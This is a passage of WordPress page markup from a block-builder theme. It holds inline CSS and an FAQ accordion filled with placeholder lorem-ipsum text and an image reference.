.block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f25b9c21-2e8e-4873-9145-526e0c982809\"} -->\n<style type=\"text/css\"> .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f25b9c21-2e8e-4873-9145-526e0c982809 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"68b54430-940b-4d40-99b2-a93a58a6a678\"} -->\n<style type=\"text/css\"> .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-68b54430-940b-4d40-99b2-a93a58a6a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"627304db-e6fd-4a57-93f7-a54b4780da61\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-627304db-e6fd-4a57-93f7-a54b4780da61\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"34ee5663\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Real Estate Law\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022The industry standard\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-34ee5663 skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-34ee5663 {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"efde8242\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-efde8242 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"43a5459d\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-43a5459d gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e85130f1\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e85130f1 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"eb7de836\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-eb7de836 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"7efd7e06-15e9-4409-bd57-879837f4059f\"} -->\n<style type=\"text/css\"> .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7efd7e06-15e9-4409-bd57-879837f4059f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"b3881bfe-ff5b-4775-a6c8-e6734143f906\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-b3881bfe-ff5b-4775-a6c8-e6734143f906 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull 